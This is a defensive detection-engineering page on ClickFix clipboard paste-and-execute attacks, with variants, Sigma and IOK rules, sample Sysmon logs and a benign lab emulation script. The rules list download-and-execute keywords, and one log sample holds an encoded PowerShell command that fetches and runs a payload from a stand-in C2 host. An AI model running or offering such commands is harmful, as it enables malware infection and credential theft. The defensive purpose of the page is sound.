← All Chokepoints HIGH

ClickFix Techniques

Initial Access T1204.004 Detection difficulty: LOW Prevalence: HIGH

Social engineering attacks that trick users into copying and executing malicious commands via clipboard manipulation. A malicious site instructs the user to copy a command (often disguised as a CAPTCHA fix, software update, or troubleshooting step) and paste it into a Run dialog, terminal, or browser address bar. The clipboard is the pivot — the scripting interpreter execution is the chokepoint. As of late 2024 through early 2025, nation-state actors including APT28 (Russia), MuddyWater (Iran), and Kimsuky (North Korea) adopted ClickFix in targeted espionage campaigns, elevating it from commodity crimeware to an advanced persistent threat vector.

By @iimp0ster · Updated 2026-03-10 · View source YAML

Prerequisites (Environmental)

• ✓ Scripting interpreter available on target system (powershell.exe, cmd.exe, mshta.exe, bash)
• ✓ Modern browser with Clipboard API enabled (default on all mainstream browsers)

Attack Chokepoints (3 invariant stages — click to expand)

Each stage is an invariant condition the attacker must satisfy — regardless of tool, variant, or threat actor. Detection at any stage breaks the chain.

1

Lure/Delivery

Research Baseline

Browser renders a page combining a Clipboard API write with an explicit execution instruction, and writes malicious command content to the Windows clipboard via navigator.clipboard.writeText or ClipboardItem

Co-occurrence of clipboard seeding and execution hint is the invariant fingerprint across all variants — no visual redesign removes both elements simultaneously; the user cannot execute content that was never placed there

• Web proxy with JS/HTML content inspection
• IOK lure-page rule feed (phish.report)
• ETW Microsoft-Windows-Win32k (GUID: 8c416c79-d49b-4f01-a467-e56d3aa8234c)
• ETW Microsoft.Windows.OLE.Clipboard (GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e)

View rule →

⚠ Bypass risk: Clipboard ETW detection requires SilkETW or EDR with Win32k telemetry — not available via standard Sysmon configuration

2

Execution

Hunt Active Hunt

User pastes clipboard content into a scripting interpreter (powershell.exe, cmd.exe, mshta.exe, wt.exe) spawned from a browser, explorer, or terminal parent

The paste-and-execute action is the entire attack primitive — no variant skips the parent-process relationship between the delivery surface and the interpreter

• Sysmon Event ID 1 (Process Creation)
• Windows Security Event ID 4688 (Process Creation)

View rule →

3

Second Stage Retrieval

Analyst SOC Alert

Spawned interpreter makes an outbound connection to attacker infrastructure within seconds of execution to download the next stage or beacon home

All payloads must retrieve a next stage or establish C2 — none are fully self-contained without any network contact

• Sysmon Event ID 3 (Network Connection)
• Sysmon Event ID 22 (DNS Query)

View rule →

⚠ Bypass risk: Delayed execution (sleep before outbound) evades short time-window correlation — extend correlation window to 5+ minutes in hunt and analyst rules

Variations

Tools and methods that exploit this chokepoint — the list grows; the chokepoint doesn't change:

ClickFix Active

2024-Q1

Original variant; fake CAPTCHA or browser-fix prompts user to paste PowerShell into Run dialog

Original variant; first documented by Proofpoint in March 2024 via TA571; fake CAPTCHA or browser fix prompts user to paste PowerShell into Run dialog or terminal

Source →

FileFix Active

2025-Q2

Shifts attack surface to Windows File Explorer address bar; weaponized within two weeks of public disclosure

Published by researcher mr.d0x on June 23, 2025; shifts attack surface from Run dialog to Windows File Explorer address bar; in-the-wild campaigns observed within two weeks of public disclosure

Source →

TerminalFix Active

2024-Q4

Mimics terminal windows; targets IT-savvy users with same execution path

Mimics terminal windows; targets IT-savvy users, still same execution path

DownloadFix Active

2024-Q4

Simplified delivery; user pastes a download-and-execute one-liner

JackFix / GlitchFix / ConsentFix Active

2025

Family of variants using clipboard-paste-execute with different social engineering pretexts

Expanding family of named variants using the same clipboard-paste-execute primitive with different social engineering pretexts (consent dialogs, glitch/error UIs); same chokepoint applies

Source →

WebDAV ClickFix Active

2025-Q1

Victims paste UNC paths into Run dialog; mshta.exe executes JScript from attacker WebDAV share

Hosts payloads on attacker-controlled WebDAV shares; victims paste UNC paths (\\server\share\payload.hta) into Run dialog, or receive .url/.lnk shortcut files that silently mount WebDAV via File Explorer; mshta.exe executes JScript/HTA from the share in a fileless chain that loads a .NET assembly into memory and injects shellcode into explorer.exe; steganography used to hide shellcode in PNG images; payloads include LummaStealer, Xworm, AsyncRAT, NetSupport, and a modified r77 rootkit; tactics first observed February 2024, campaign volume spiked September 2024, detailed analysis published February 2026

Source →

InstallFix Active

2026-Q1

Clones AI/developer tool install pages; distributed via Google Ads malvertising

Clones legitimate software installation pages — particularly AI/developer tools such as Claude Code CLI — distributed via Google Ads malvertising; swaps the legitimate curl-to-bash install one-liner with a malicious equivalent pointing to an attacker-controlled server; exploits developer trust in official-looking documentation; Windows chain: mshta.exe → conhost.exe → Amatera infostealer; also targets macOS; documented by PushSecurity and BleepingComputer, February–March 2026

Source →

Windows Terminal ClickFix Active

2026-Q1

Lure uses Win+X→I shortcut; hex/XOR-encoded PowerShell in wt.exe bypasses Run-dialog detections

Disclosed by Microsoft Defender Experts, March 6, 2026; lure page instructs users to open Windows Terminal via Win+X→I shortcut and paste a hex-encoded XOR-compressed PowerShell payload; bypasses Run-dialog detections since the parent process is wt.exe (WindowsTerminal.exe) rather than explorer.exe; execution chain: wt.exe → powershell.exe → cmd.exe → MSBuild.exe (LOLBin); final payload is Lumma Stealer delivered via renamed 7-Zip binary extracting a malicious ZIP; uses QueueUserAPC injection into chrome.exe and msedge.exe for credential harvesting

Source →

DNS-based ClickFix Active

2026-Q1

Payload embedded in DNS Name field response; nslookup retrieval evades URL-based web filtering

Disclosed by Microsoft February 2026; attributed to KongTuke targeting domain-joined corporate machines; user pastes cmd.exe command into Run dialog that invokes nslookup against an attacker-controlled DNS IP; PowerShell payload is embedded in the DNS Name field response (not a TXT record — bypasses TXT-record monitoring); cmd.exe extracts and executes the payload, which downloads a ZIP, drops a Python-based RAT (ModeloRAT) via VBScript, and persists via a Startup folder shortcut; evades URL-based web filtering entirely

Source →

Detection Strategy

Build detections iteratively. Start broad to understand your baseline, then tighten to production-ready.

Goal: Identify any scripting interpreter making outbound external connections

Log Sources

• Windows Security Event Log (Process Creation / Event ID 4688)
• Sysmon Event ID 3 (Network Connection)
• DNS query logs

FP Rate: High

Use Case: Threat research baseline; understanding scripting interpreter network behavior

Detection Logic

Process: powershell.exe OR cmd.exe OR wscript.exe OR cscript.exe OR mshta.exe Network: External destination (non-RFC1918) initiated by that process Parent: ANY

Sigma Rule — Research Level

View on GitHub Download

title: Scripting Interpreter Outbound Network Connection
id: c4f8a2b1-3e7d-4a5c-8b9f-2d1e6f0a7c3b
status: experimental
description: >
  Detects scripting interpreters (powershell.exe, cmd.exe, wscript.exe, etc.) making
  outbound connections to external (non-RFC1918) addresses. Broad research-level rule
  for the ClickFix chokepoint. Establishes baseline visibility into scripting interpreter
  network behavior. High false positive rate expected — use for research and baselining only.
references:
  - https://huntress.com/blog/dont-sweat-clickfix-techniques
  - https://mhaggis.github.io/ClickGrab/
  - https://attack.mitre.org/techniques/T1204/001/
author: "@iimp0ster"
date: 2025/01/15
tags:
  - attack.initial_access
  - attack.t1204.001
  - attack.t1204.003
  - detection.maturity.research
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Initiated: 'true'
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
      - '\mshta.exe'
  filter_private_ranges:
    DestinationIp|startswith:
      - '10.'
      - '172.16.'
      - '172.17.'
      - '172.18.'
      - '172.19.'
      - '172.20.'
      - '172.21.'
      - '172.22.'
      - '172.23.'
      - '172.24.'
      - '172.25.'
      - '172.26.'
      - '172.27.'
      - '172.28.'
      - '172.29.'
      - '172.30.'
      - '172.31.'
      - '192.168.'
      - '127.'
      - '::1'
      - 'fe80:'
  filter_loopback:
    DestinationIp: '0.0.0.0'
  condition: selection and not 1 of filter_*
falsepositives:
  - Legitimate administrative scripts making web requests (SCCM, Ansible, etc.)
  - Software update mechanisms (Windows Update, application updaters)
  - Monitoring agents and IT management tooling
  - Developer tooling (npm, pip, curl wrappers, build scripts)
  - Security scanning tools
level: low

Goal: Scripting interpreter spawned by browser, explorer, or Windows Terminal with external network connection

Log Sources

• Sysmon Event ID 1 (Process Creation)
• Sysmon Event ID 3 (Network Connection)
• DNS query logs

FP Rate: Medium

Use Case: Proactive hunting for user-initiated clipboard execution; campaign detection

Detection Logic

Process: powershell.exe OR cmd.exe OR wscript.exe OR cscript.exe OR mshta.exe ParentProcess: explorer.exe OR wt.exe OR WindowsTerminal.exe OR chrome.exe OR firefox.exe OR msedge.exe OR iexplore.exe OR brave.exe OR opera.exe Network: External connection within 60 seconds of process start Additional pivot: nslookup.exe spawned by cmd.exe with a non-RFC1918 IP as DNS server argument (KongTuke DNS-staging variant)

Sigma Rule — Hunt Level

View on GitHub Download

title: Browser or Explorer Spawning Script Interpreter
id: a7b3c9d2-5e8f-4a1b-9c6d-3f2e8b0a4d7e
status: experimental
description: >
  Detects scripting interpreters (PowerShell, cmd, wscript, mshta) spawned directly by
  web browsers, Windows Explorer, or Windows Terminal. This is a hunt-level rule
  targeting the ClickFix chokepoint, where users are socially engineered to paste and
  execute malicious commands. The Windows Terminal path (wt.exe parent) covers the
  March 2026 variant disclosed by Microsoft Defender Experts (Lumma Stealer delivery
  via Win+X→I terminal lure). Browsers and Explorer should rarely directly spawn
  scripting interpreters in normal enterprise operations.
references:
  - https://huntress.com/blog/dont-sweat-clickfix-techniques
  - https://staging.huntress.com/blog/dont-sweat-clickfix-techniques
  - https://mhaggis.github.io/ClickGrab/
  - https://www.aitmfeed.com/blog/blog-1/tracking-clickfix-infrastructure-4
  - https://attack.mitre.org/techniques/T1204/001/
  - https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
  - https://www.bleepingcomputer.com/news/security/new-clickfix-attack-abuses-nslookup-to-retrieve-powershell-payload-via-dns/
author: "@iimp0ster"
date: 2025/01/15
tags:
  - attack.initial_access
  - attack.t1204.001
  - attack.t1204.003
  - detection.maturity.hunt
logsource:
  category: process_creation
  product: windows
detection:
  selection_interpreter:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
      - '\mshta.exe'
  selection_parent_browser:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
      - '\iexplore.exe'
      - '\opera.exe'
      - '\brave.exe'
      - '\vivaldi.exe'
      - '\waterfox.exe'
  selection_parent_explorer:
    ParentImage|endswith:
      - '\explorer.exe'
      - '\wt.exe'
      - '\WindowsTerminal.exe'
  filter_known_legit:
    # Browser-launched shell integrations for file associations (rare but legitimate)
    CommandLine|contains:
      - 'IEShims.dll'
      - 'ShellExecute'
  condition: selection_interpreter and (selection_parent_browser or selection_parent_explorer) and not filter_known_legit
falsepositives:
  - Browser extensions that invoke system shell for file processing (rare)
  - Shell integrations for file associations opened via browser download
  - IT tooling launched from Windows Explorer (e.g., admin scripts opened by double-click)
  - Some enterprise software launchers that spawn from explorer.exe
level: medium

Goal: Browser-spawned interpreter with encoded command and outbound connection to low-reputation destination

Log Sources

• Sysmon Event ID 1 (Process Creation)
• Sysmon Event ID 3 (Network Connection)
• Sysmon Event ID 22 (DNS Query)
• Parent process chain analysis

FP Rate: Low

Use Case: Automated SOC alerting; immediate IR response trigger

Detection Logic

Process: powershell.exe OR cmd.exe ParentProcess: [browser] OR explorer.exe CommandLine: Contains encoded command OR obfuscation pattern
  (-enc, -EncodedCommand, FromBase64String, IEX, Invoke-Expression)
Network: External connection within 30 seconds UserContext: Interactive logon session (LogonType 2 or 10)

Sigma Rule — Analyst Level

View on GitHub Download

title: Browser-Spawned Script with Encoded Command — ClickFix/Clipboard Attack
id: f1e2d3c4-b5a6-4789-a0b1-c2d3e4f5a6b7
status: experimental
description: >
  High-fidelity detection for ClickFix and similar clipboard-based social engineering
  attacks. Detects scripting interpreters with encoded or obfuscated command lines
  spawned by browsers or Windows Explorer. This pattern is strongly indicative of a
  user pasting and executing a malicious command copied from a threat actor-controlled
  webpage. Minimal false positives expected in most enterprise environments.
references:
  - https://huntress.com/blog/dont-sweat-clickfix-techniques
  - https://staging.huntress.com/blog/dont-sweat-clickfix-techniques
  - https://mhaggis.github.io/ClickGrab/
  - https://www.aitmfeed.com/blog/blog-1/tracking-clickfix-infrastructure-4
  - https://attack.mitre.org/techniques/T1204/001/
  - https://attack.mitre.org/techniques/T1204/003/
author: "@iimp0ster"
date: 2025/01/15
tags:
  - attack.initial_access
  - attack.t1204.001
  - attack.t1204.003
  - attack.defense_evasion
  - attack.t1027
  - detection.maturity.analyst
logsource:
  category: process_creation
  product: windows
detection:
  selection_interpreter:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\mshta.exe'
  selection_parent:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
      - '\iexplore.exe'
      - '\opera.exe'
      - '\brave.exe'
      - '\vivaldi.exe'
      - '\explorer.exe'
  selection_encoded:
    CommandLine|contains:
      # PowerShell encoded command flags
      - ' -enc '
      - ' -EncodedCommand '
      - ' -ec '
      # Base64 decode patterns
      - 'FromBase64String'
      - 'Convert]::FromBase64'
      # Execution patterns
      - 'IEX ('
      - 'IEX('
      - 'Invoke-Expression'
      - 'iex('
      # Download-and-execute patterns
      - 'DownloadString'
      - 'DownloadFile'
      - 'WebClient'
      - 'Net.WebClient'
      - 'Invoke-WebRequest'
      - 'iwr '
      - 'curl '
      # mshta http invocation
      - 'mshta http'
      - 'mshta vbscript'
      # cmd piping to powershell
      - '/c powershell'
      - '/c start'
  filter_legit_software:
    # Known-good software that uses encoded commands during legitimate operation
    # Tune this list for your environment
    ParentCommandLine|contains:
      - 'Teams.exe'
      - 'OneDrive.exe'
  condition: selection_interpreter and selection_parent and selection_encoded and not filter_legit_software
falsepositives:
  - Legitimate software deployment tools that encode commands (rare when browser is parent)
  - Custom IT automation scripts that use encoded commands and are user-initiated
  - Developers using PowerShell with encoding from browser-launched terminals
level: high

Early Detection Layers

Detect before the user pastes or executes — earlier in the kill chain than the Sysmon-based rules above, using different data sources.

Pre-Execution — ETW Clipboard Write

Goal: Browser process writing scripting keywords to the Windows clipboard via ETW (Microsoft-Windows-Win32k SetClipboardData). Fires before the user pastes. Clipboard seeding is an inescapable prerequisite for all ClickFix variants.

Log Sources

• ETW Microsoft-Windows-Win32k (GUID: 8c416c79-d49b-4f01-a467-e56d3aa8234c)
• ETW Microsoft.Windows.OLE.Clipboard (GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e)
• SilkETW or EDR with Win32k telemetry → Windows Event Forwarding

FP Rate: Medium

Use Case: On-host pre-execution detection; pairs with Sysmon EID 1 to confirm paste

Note: Requires SilkETW or compatible EDR; not available via standard Sysmon config

Detection Logic

Process: [any browser] writing to clipboard ClipboardContent contains: powershell, -enc, mshta, nslookup, cmd.exe, IEX, \\\\ (UNC)

Sigma Rule

View on GitHub Download

title: Browser Process Writing Scripting Payload to Clipboard (ETW)
id: f3b8e2d1-7c4a-4b9e-a2f6-1d8e5c0b3a7f
status: experimental
description: >
  Detects browser processes writing PowerShell or command-interpreter keywords to the
  Windows clipboard via ETW (Microsoft-Windows-Win32k SetClipboardData events). This is
  the ClickFix chokepoint at the pre-execution layer — the clipboard write fires before
  the user pastes and executes the payload. Covers all ClickFix variants (ClickFix,
  FileFix, WebDAV ClickFix, Windows Terminal ClickFix, InstallFix, DNS-based ClickFix)
  because clipboard seeding is an inescapable prerequisite for the attack regardless of
  which paste target the lure page instructs the user to use.
references:
  - https://gist.github.com/mattifestation/04e8299d8bc97ef825affe733310f7bd
  - https://github.com/mandiant/SilkETW
  - https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
  - https://attack.mitre.org/techniques/T1204/004/
author: "@iimp0ster"
date: 2026/03/10
tags:
  - attack.initial_access
  - attack.t1204.004
  - detection.maturity.hunt
  - detection.datasource.etw
logsource:
  product: windows
  category: clipboard
  # Requires ETW infrastructure. Two provider options:
  #   Microsoft-Windows-Win32k   GUID: 8c416c79-d49b-4f01-a467-e56d3aa8234c
  #   Microsoft.Windows.OLE.Clipboard  GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e
  # Configure SilkETW (github.com/mandiant/SilkETW) with either provider and route
  # output to Windows Event Log or forward to SIEM via Windows Event Forwarding (WEF).
  # Field names below reflect SilkETW JSON serialization defaults — adjust to match
  # your ingestion pipeline's schema.
detection:
  selection_browser:
    ProcessName|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
      - '\iexplore.exe'
      - '\brave.exe'
      - '\opera.exe'
      - '\vivaldi.exe'
      - '\waterfox.exe'
  selection_payload_keywords:
    ClipboardContent|contains:
      - 'powershell'
      - '-EncodedCommand'
      - '-enc '
      - 'mshta'
      - 'nslookup'
      - 'cmd.exe'
      - 'wscript'
      - 'cscript'
      - 'IEX'
      - 'Invoke-Expression'
      - '\\\\'   # UNC path prefix — WebDAV ClickFix variant
  condition: selection_browser and selection_payload_keywords
falsepositives:
  - Developer tools or documentation sites that copy script examples to clipboard (rare
    match against these specific keywords in combination with a browser process)
  - Code snippet managers or password managers with keyboard shortcut triggers
level: high

Pre-Interaction — IOK Lure Page

Goal: Lure page combining a JavaScript Clipboard API write with a paste-into-shell instruction. The co-occurrence of these two elements is the invariant fingerprint of all ClickFix variants regardless of visual design, threat actor, or domain. Fires at the delivery layer, before the user interacts with the page.

Log Sources

• Web proxy with JS/HTML content inspection
• phish.report IOK community rule feed
• URLScan.io live scan API

FP Rate: Low

Use Case: Proactive infrastructure blocking; phishing triage; threat intel enrichment

Detection Logic

js contains: navigator.clipboard.writeText OR navigator.clipboard.write OR ClipboardItem html contains: Win+R OR Run dialog OR Ctrl+V OR Windows Terminal OR Win+X OR address bar Condition: clipboard_api AND execution_hint

IOK Rule

View on GitHub Download

title: ClickFix Lure Page — Clipboard API Write with Execution Instruction
description: >
  Detects ClickFix-family lure pages that combine a JavaScript Clipboard API write
  (navigator.clipboard.writeText / ClipboardItem) with instructions directing the user
  to paste into a Run dialog, Windows Terminal, File Explorer address bar, or similar
  execution context. The co-occurrence of clipboard seeding AND an execution instruction
  is the stable invariant across all ClickFix variants regardless of visual design,
  threat actor, or obfuscation technique. Covers: ClickFix (original), FileFix, WebDAV
  ClickFix, Windows Terminal ClickFix, InstallFix, DNS-based ClickFix, and future variants
  that have not yet been named.
tags:
  - clickfix
  - initial_access
  - t1204.004
references:
  - https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
  - https://mrd0x.com/filefix-clickfix-alternative/
  - https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
  - https://attack.mitre.org/techniques/T1204/004/
  - https://phish.report/docs/iok-rule-reference
detection:
  clipboard_api:
    js|contains:
      - 'navigator.clipboard.writeText'
      - 'navigator.clipboard.write'
      - 'ClipboardItem'
  execution_hint:
    html|contains:
      - 'Win+R'
      - 'Windows key'
      - 'Run dialog'
      - 'Ctrl+V'
      - 'Windows Terminal'
      - 'Win+X'
      - 'address bar'
      - 'Ctrl+L'
  condition: clipboard_api and execution_hint
# ─── IOK Detection Notes ─────────────────────────────────────────────────────────
# Kill chain position: PRE-INTERACTION — fires against the lure page itself, before
# the user copies or executes anything. Earliest possible detection point.
#
# Why this condition is stable across all variants:
#   clipboard_api   — the browser MUST write the payload to the clipboard; without this
#                     the user cannot paste it. Cannot be removed without breaking the attack.
#   execution_hint  — the page MUST instruct the user where to paste; without this the
#                     user will not execute the payload. Cannot be removed without breaking
#                     the social engineering component.
#
# False positive profile:
#   clipboard_api alone → HIGH FP (widely used by legitimate sites for copy buttons)
#   execution_hint alone → LOW FP (paste-into-shell instructions are unusual on legit sites)
#   clipboard_api AND execution_hint → VERY LOW FP (near-unique to ClickFix)
#
# Evasion considerations:
#   - Obfuscated clipboard writes (e.g., atob() + eval(), string concatenation) evade
#     js|contains; add dom|contains matchers if your scanner supports post-JS rendering.
#   - Multilingual lures: add translated execution instructions for your threat landscape
#     (e.g., Japanese: 'を押して', Korean: '실행', etc.)
#   - Dynamically injected clipboard write (loaded from external JS) evades js|contains;
#     pair with requests|contains for known ClickFix JS CDN patterns.
#
# Usage:
#   - Submit to phish.report/IOK for community feed inclusion.
#   - Run against URLScan.io live scan API for proactive infrastructure hunting.
#   - Integrate with web proxy content inspection for real-time blocking.

Evolution Timeline (9 events — click to expand)

Techniques and tooling evolve; the underlying detection chokepoint does not.

2026-Q1

InstallFix — Developer-Targeted ClickFix via Malvertising

Change: Lure evolves from fake CAPTCHA to cloned developer tool install documentation distributed via Google Ads malvertising; execution chokepoint unchanged.

Detection impact: No change to the execution chokepoint; mshta.exe → conhost.exe → infostealer is caught by existing Research and Hunt rules; developer endpoints require the same coverage as general enterprise endpoints

2026-Q1

KongTuke DNS-Staging via nslookup (Microsoft disclosure, February 2026)

Change: Payload staging channel shifts from HTTP to DNS Name field response; nslookup queries attacker-controlled DNS server, evading URL-based web filtering entirely.

Detection impact: Add nslookup.exe spawned by cmd.exe with a hardcoded external IP as a hunt indicator (Sysmon EID 1); monitor for DNS responses with anomalously large Name fields; existing browser-parent scripting interpreter rules do not catch this path since execution originates from the Run dialog, not a browser

2026-Q1

Windows Terminal ClickFix (Microsoft Defender Experts disclosure, March 6, 2026)

Change: Paste target shifts to Windows Terminal (wt.exe) with hex/XOR-encoded payload; MSBuild.exe used as LOLBin; existing browser-parent rules miss this path entirely.

Detection impact: Existing browser-parent and explorer-parent detection rules miss this path entirely; wt.exe / WindowsTerminal.exe must be added as parent process in Hunt and Analyst rules; PowerShell Script Block Logging required to surface hex/XOR-encoded commands; MSBuild.exe spawned outside build context is an additional high-fidelity pivot

2025-Q2

FileFix published and weaponized within two weeks

Change: Attack surface expands from Run dialog to File Explorer address bar; same clipboard delivery, new parent-process path to monitor.

Detection impact: Monitor for suspicious processes spawned from explorer.exe with File Explorer address bar as vector; existing browser-parent rules may not catch this path

2025-Q1

WebDAV ClickFix Variant

Change: Payload delivery migrates from HTTP to WebDAV UNC paths; mshta.exe executes JScript directly from attacker share in a fileless chain injecting .NET assembly into explorer.exe.

Detection impact: mshta.exe already in detection scope; UNC path patterns (\\\\) in CommandLine are a higher-confidence indicator; fileless .NET injection via VirtualAllocEx/WriteProcessMemory/CreateRemoteThread requires memory-based detection for later stages

2024-Q4

Nation-state adoption begins

Change: APT28, MuddyWater (TA450), Kimsuky (TA427), and UNK_RemoteRogue adopt ClickFix; payloads shift from commodity stealers to RATs and APT implants.

Detection impact: Payloads shift from commodity stealers (Lumma) to RATs (QuasarRAT) and APT implants; lure quality increases significantly; detection logic unchanged but triage priority rises

2024-Q4

DownloadFix Variant

Change: Simplified payload with direct download-execute one-liner; less obfuscation required.

Detection impact: Same clipboard interaction and execution pattern

2024-Q4

TerminalFix Variant

Change: UI mimics terminal windows targeting IT-savvy users; payload and execution path unchanged.

Detection impact: No change — still scripting interpreter execution

2024-Q1

ClickFix Original

Change: First documented by Proofpoint via TA571; no malicious attachment required — user clipboard is the entire delivery mechanism.

Detection impact: New pattern requiring detection development

Raw Log Samples (3 samples — click to expand)

Real-world log events produced by this technique and which sigma rules they trigger.

Sysmon EID 1

Research Hunt Analyst

PowerShell spawned by Chrome with encoded command — the core ClickFix indicator

EventID: 1 (Process Create)
UtcTime: 2024-11-03 14:52:17.442
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -NonInteractive -NoProfile -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjADIALQBkAG8AbQBhAGkAbgAvAHAAYQB5AGwAbwBhAGQAJwApAA==
CurrentDirectory: C:\Users\jsmith\
ParentProcessId: 6892
ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe
ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer
# Key signal: ParentImage=chrome.exe + CommandLine contains -EncodedCommand
# User copied "fix" command from malicious page, pasted into Run dialog

Sysmon EID 22

Research Analyst

DNS query from PowerShell to attacker C2 domain — DNS resolution phase

EventID: 22 (DNS query)
UtcTime: 2024-11-03 14:52:18.031
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
QueryName: update-cdn77.net
QueryStatus: 0
QueryResults: type: 5 cdn-update-service.net;::ffff:185.220.101.47;
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
# Non-browser process making DNS query for a newly registered domain

Sysmon EID 3

Research Hunt Analyst

Outbound network connection from PowerShell to C2 — payload download/beacon

EventID: 3 (NetworkConnect)
UtcTime: 2024-11-03 14:52:18.247
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: CORP\jsmith
Protocol: tcp
Initiated: true
SourceIp: 10.10.1.87
SourcePort: 54221
DestinationIp: 185.220.101.47
DestinationHostname: update-cdn77.net
DestinationPort: 443
# powershell.exe connecting to non-RFC1918 IP within seconds of parent=chrome.exe launch

Emulation Script (click to expand)

⚠ Lab use only. Run in isolated lab VM only. Makes a benign outbound HTTP request to example.com.

powershell ATT&CK: T1204.004 Simulates ClickFix interpreter execution with encoded command and outbound connection

POWERSHELL

View on GitHub Download

#Requires -Version 5.1
# MITRE ATT&CK: T1204.004 — Malicious Copy-Paste
# Simulates ClickFix UI deception chain that spawns a script interpreter to execute a payload.

[CmdletBinding()]
param(
    [switch]$UseVbsShim,
    [switch]$CleanupOnly
)

Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

$VbsShimPath  = Join-Path $env:TEMP "cf_shim_$(Get-Random).vbs"
$C2Endpoint   = 'https://example.com'

function Write-Step ([string]$Msg) { Write-Host "[*] $Msg" -ForegroundColor Cyan }
function Write-Ok   ([string]$Msg) { Write-Host "[+] $Msg" -ForegroundColor Green }
function Write-Warn ([string]$Msg) { Write-Host "[!] $Msg" -ForegroundColor Yellow }

function Remove-Artefacts {
    if (Test-Path $VbsShimPath) {
        Remove-Item $VbsShimPath -Force -ErrorAction SilentlyContinue
        Write-Ok "Removed VBS shim: $VbsShimPath"
    }
}

if ($CleanupOnly) { Remove-Artefacts; exit 0 }

Write-Host ""
Write-Host "=== ClickFix Technique Emulation ===" -ForegroundColor Magenta
Write-Host "    T1204.004 | Detection Chokepoints Project" -ForegroundColor DarkGray
Write-Host ""

Write-Step "Step 1/3 — Executing PowerShell with -EncodedCommand flag"

# Benign payload: Get-Date | Out-String (base64 encoded)
$BenignCmd   = 'Get-Date | Out-String'
$EncodedCmd  = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($BenignCmd))

Write-Verbose "  Encoded payload (benign): $EncodedCmd"
$result = powershell.exe -NonInteractive -NoProfile -EncodedCommand $EncodedCmd
Write-Ok "Encoded command executed. Output: $($result.Trim())"

Start-Sleep -Milliseconds 300

Write-Step "Step 2/3 — DNS resolution + outbound HTTP connection from interpreter"

try {
    $null = [System.Net.Dns]::GetHostAddresses('example.com')
    Write-Ok "DNS resolved example.com (Sysmon EID 22 generated)"
} catch {
    Write-Warn "DNS resolution failed: $_"
}

try {
    $resp = Invoke-WebRequest -Uri $C2Endpoint -Method HEAD -TimeoutSec 10 `
        -UseBasicParsing -ErrorAction Stop
    Write-Ok "Outbound connection made (HTTP $($resp.StatusCode)) — Sysmon EID 3 generated"
} catch {
    Write-Warn "Network request failed (telemetry may still fire): $_"
}

Start-Sleep -Milliseconds 300

# This is what makes Hunt/Analyst rules fire — browser/scripting parent spawning PowerShell
if ($UseVbsShim) {
    Write-Step "Step 3/3 — Spawning PowerShell via VBScript shim (browser parent simulation)"
    Write-Verbose "  Note: For full browser parent (chrome.exe → powershell.exe), manually:"
    Write-Verbose "        1. Open Chrome, press F12 → Console"
    Write-Verbose "        2. This script cannot automate that chain safely"

    # VBScript spawns PowerShell with encoded command — simulates wscript.exe parent chain
    $InnerEncoded = [Convert]::ToBase64String(
        [System.Text.Encoding]::Unicode.GetBytes('Write-Host "ClickFix emulation - child of wscript"')
    )
    $VbsContent = @"
Dim oShell
Set oShell = CreateObject("WScript.Shell")
oShell.Run "powershell.exe -NonInteractive -NoProfile -EncodedCommand $InnerEncoded", 0, True
"@
    Set-Content -Path $VbsShimPath -Value $VbsContent -Encoding ASCII
    Write-Ok "VBS shim written to $VbsShimPath"

    try {
        $proc = Start-Process -FilePath 'wscript.exe' -ArgumentList "`"$VbsShimPath`"" `
            -Wait -PassThru -ErrorAction Stop
        Write-Ok "VBScript → PowerShell chain executed (wscript.exe PID $($proc.Id))"
        Write-Ok "Expected parent chain in telemetry: wscript.exe → powershell.exe"
    } catch {
        Write-Warn "VBS shim execution failed: $_"
    }
} else {
    Write-Warn "Step 3 skipped (run with -UseVbsShim for Hunt/Analyst parent chain simulation)"
    Write-Warn "For full Analyst rule validation, Hunt parent chain requires browser context."
    Write-Host ""
    Write-Host "  Manual Hunt/Analyst test:" -ForegroundColor DarkGray
    Write-Host "    1. Open Chrome/Edge DevTools console" -ForegroundColor DarkGray
    Write-Host "    2. Paste: powershell.exe -enc $EncodedCmd" -ForegroundColor DarkGray
    Write-Host "    3. Check Sysmon EID 1 for ParentImage=chrome.exe" -ForegroundColor DarkGray
}

Write-Host ""
Write-Step "Cleaning up artefacts"
Remove-Artefacts

Write-Host ""
Write-Host "=== Emulation Complete ===" -ForegroundColor Magenta
Write-Host ""
Write-Host "Expected detections:" -ForegroundColor White
